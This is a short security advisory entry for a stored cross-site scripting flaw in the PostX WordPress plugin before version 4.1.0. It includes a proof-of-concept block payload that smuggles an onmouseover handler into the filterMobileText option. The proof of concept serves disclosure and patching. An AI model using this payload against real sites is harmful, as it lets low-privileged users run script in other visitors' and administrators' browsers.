wpexploit | Dmitrii Ignatyev | WPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1
May 27, 2024 - 12:00 a.m.

PostX < 4.1.0 - Contributor+ Stored XSS

Tags: postx contributor+ stored xss, poc, june 10 2024, exploit

AI Score: 8.3 High (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

As a contributor, put the below code in a post while in Code Editor mode:

<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->

The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! text.
